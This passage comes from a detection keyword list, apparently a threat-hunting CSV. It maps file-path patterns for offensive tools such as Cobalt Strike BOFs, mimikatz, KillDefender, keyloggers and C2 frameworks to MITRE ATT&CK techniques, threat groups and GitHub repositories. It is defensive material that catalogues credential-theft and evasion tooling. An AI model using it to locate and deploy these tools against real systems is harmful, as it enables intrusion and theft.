loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/k8gege/scrun/*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*/k8gege520*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/ka7ana/CVE*.ps1*,offensive_tool_keyword,poc,Simple PoC in PowerShell for CVE-2023-23397,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear,Exploitation tools,https://github.com/ka7ana/CVE-2023-23397,1,1,N/A,N/A,1,36,11,2023-03-16T19:29:49Z,2023-03-16T19:10:37Z -*/kali/pool/main/*,offensive_tool_keyword,kali,Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/kali-linux-2023*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/kali-tools-*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/katoolin3*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*/kdstab.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/KDStab.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/KDStab/*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/keepass_discover_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/KeeThief.git*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*/kerberoast.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast.c*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/kerberoast.c*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*/kerberoast.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/kerberoast.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/kerberoast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/kerberos.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/kerberos-ldap-password-hunter*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/oldboy21/LDAP-Password-Hunter,1,1,N/A,10,2,189,27,2023-01-06T15:32:34Z,2021-07-26T14:27:01Z -*/kerberosticket.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/kerbrute/*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*/KernelMii.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*/keygen.exe*,greyware_tool_keyword,_,generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares,T1204 - T1027 - T1059 - T1055 - T1060 - T1195,TA0005 - TA0002 - TA0011,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/keylogger.cpp*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*/KeyLogger.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/keylogger.exe*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*/keylogger/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/keyscan.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/killav.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/killav.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/KillDefenderBOF*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*/kimi.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/kismet*,offensive_tool_keyword,kismet,Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.,T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kismetwireless/kismet,1,0,N/A,N/A,10,1297,272,2023-09-29T14:28:16Z,2016-09-20T13:26:00Z -*/kismetwireless/*,offensive_tool_keyword,kismet,Kismet is a wireless network and device detector. sniffer. wardriving tool. 
and WIDS (wireless intrusion detection) framework.,T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kismetwireless/kismet,1,1,N/A,N/A,10,1297,272,2023-09-29T14:28:16Z,2016-09-20T13:26:00Z -*/kitrap0d.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/kittens/haloKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/kittens/recycleKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/KittyStager/*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/kiwi.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/kiwi_passwords.yar*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/klezVirus/CandyPotato*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/knqyf263/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/knqyf263/CVE-2022-0847,1,1,N/A,N/A,1,46,9,2022-03-08T13:54:08Z,2022-03-08T13:48:55Z -*/knx-gateway-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/knx-gateway-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012,TA0002 - TA0005 - TA0007 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/zerosum0x0/koadic,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/koadic.git*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
